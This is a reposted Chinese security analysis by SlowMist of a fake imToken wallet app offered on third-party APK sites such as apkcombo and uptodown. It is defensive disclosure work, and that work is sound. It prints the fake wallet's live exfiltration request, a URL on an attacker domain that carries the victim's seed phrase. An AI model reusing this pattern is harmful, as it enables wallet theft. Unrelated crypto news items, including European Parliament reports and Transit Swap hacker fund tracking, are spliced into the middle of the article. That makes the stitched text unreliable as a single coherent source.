TOKEN:慢雾:Web3假钱包第三方源调查分析_Fysical

背景

基于区块链技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包“登录”;这与我们传统意义上的“登录”不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行“登录”,我们可以看到“登录”钱包时显示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

欧洲议会研究:加密资产应默认为证券,管理DeFi的自治组织应获得合法地位:金色财经报道,欧洲议会研究报告指出,加密资产应默认视为证券,自治组织应获得法律地位来管理去中心化金融(DeFi)。该报告称,除非该国监管机构另有规定,否则所有加密资产都应被视为可转让证券,这意味着它们将受到欧盟针对传统股票和债券的严格管理和授权规定的约束。

据悉,该报告是由卢森堡、悉尼和香港的大学学者组成的小组起草的,应欧洲议会经济与货币事务委员会要求,该报告的结果并非欧洲议会的正式立场。[2023/6/1 11:53:03]

在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?网站分析

鉴于下载途径众多,我们今天以apkcombo为例看看,apkcombo是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?我们先看下apkcombo的流量有多大:

欧洲议会议员Stefan Berge推出Bergoletten NFT:8月15日消息,欧洲议会议员Stefan Berge近日在OpenSea上推出Bergoletten NFT,拍卖将于8月15日结束。该NFT由Stefan Berger设计和创建,其图片中包含一双拖鞋,鞋上分别标有“#bergo”和“ropa”字样。(Bitcoin.com)[2022/8/15 12:26:12]

据数据统计站点similarweb统计,apkcombo站点:全球排名:1,809国家排名:7,370品类排名:168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W+:

欧洲议会推迟对加密资产法案拟议法规中有关PoW辩论的投票:2月25日消息,为了回应来自加密世界的愤怒,欧盟议会推迟了一项针对其加密货币市场监管的关键投票。被称为MiCA的“加密资产市场指令”本已列入2月28日的投票名单,将由欧洲议会与欧盟理事会和欧盟委员会进行辩论。然而,欧盟议员、负责投票的报告员Stefan Berger今天表示,此次投票已被推迟。

一名接近该指令谈判的消息人士称,争论的要点是后期的变化,一些人将其解读为针对PoW网络的禁令。在信息泄露后引发了负面报道和Twitter上铺天盖地的回应后,右翼和中右翼成员撤回了对最新修正案的支持。

Berger在Twitter上解释说:“作为报告员,对我来说最重要的是,MiCA指令没有被误解为事实上的比特币禁令。”(The Block)[2022/2/25 10:16:20]

那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:https://play.google.com/store/apps/details?id=im.token.app

动态 | 欧洲议会呼吁促进贸易区块链采用:据coindesk报道,欧洲议会(EP)周四通过了一项名为“区块链:前瞻性贸易政策” 的决议,阐述了区块链技术可如何改善欧盟贸易政策,呼吁采取措施促进贸易和商业区块链的采用。欧洲议会表示,区块链可以提高供应链透明度、简化贸易流程、降低成本和防止腐败、检测逃税并提高数据安全性。通过使用区块链技术,交易商可以将所有文件上传到一个地方,以便从优惠关税中受益。区块链技术还可以帮助当局自动从这些方获取信息,并改进验证和交易流程。此外,中小企业也可以从区块链中受益,他们可以通过使用智能合约实现各方之间更好的沟通、安全支付并简化业务。[2018/12/15]

由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为:https://apkcombo.com/downloader/#package=im.token.app

慢雾:Transit Swap事件中转移到Tornado Cash的资金超过600万美元:金色财经报道,慢雾 MistTrack 对 Transit Swap 事件资金转移进行跟进分析,以下将分析结论同步社区:

Hacker#1 攻击黑客(盗取最大资金黑客),获利金额:约 2410 万美元

1: 0x75F2...FFD46

2: 0xfa71...90fb

已归还超 1890 万美元的被盗资金;12,500 BNB 存款到 Tornado Cash;约 1400 万 MOONEY 代币和 67,709 DAI 代币转入 ShibaSwap: BONE Token 合约地址。

Hacker#2 套利机器人-1,获利金额:1,166,882.07 BUSD

0xcfb0...7ac7(BSC)

保留在获利地址中,未进一步转移。

Hacker#3 攻击模仿者-1,获利金额:356,690.71 USDT

0x87be...3c4c(BSC)

Hacker#4 套利机器人-2,获利金额:246,757.31 USDT

0x0000...4922(BSC)

已全部追回。

Hacker#5 套利机器人-3,获利金额:584,801.17 USDC

0xcc3d...ae7d(BSC)

USDC 全部转移至新地址 0x8960...8525,后无进一步转移。

Hacker#6 攻击模仿者-2,获利金额:2,348,967.9 USDT

0x6e60...c5ea(BSC)

Hacker#7 套利机器人-4,获利金额:5,974.52 UNI、1,667.36 MANA

0x6C6B...364e(ETH)

通过 Uniswap 兑换为 30.17 ETH,其中 0.71 支付给 Flashbots,剩余 ETH 未进一步转移。[2022/10/6 18:41:10]

上图我们可以发现,apkcombo提供的版本为24.9.11,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。在编写本文时imToken钱包的最新版本为2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如:uptodown下载地址:https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:

钱包分析

在之前我们已经分析过不少假钱包的案例,如:2021-11-24我们披露:《慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

根据逆向APK代码和实际分析流量包发现,助记词发送方式:https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图,最早的“api.funnel.rocks”证书出现在2022-06-03,也就是攻击开始的大概时间:

俗话说一图胜千言,最后我们画一个流程图:

总结

目前这种局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。同时,如需使用钱包,请务必认准以下主流钱包App官方网址:1/imToken钱包:https://token.im/2/TokenPocket钱包:https://www.tokenpocket.pro/3/TronLink钱包:https://www.tronlink.org/4/比特派钱包:https://bitpie.com/5/MetaMask钱包:https://metamask.io/6/TrustWallet:https://trustwallet.com/请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。致谢:感谢在溯源过程中imToken官方提供的验证支持。由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

区块博客

[0:15ms0-3:659ms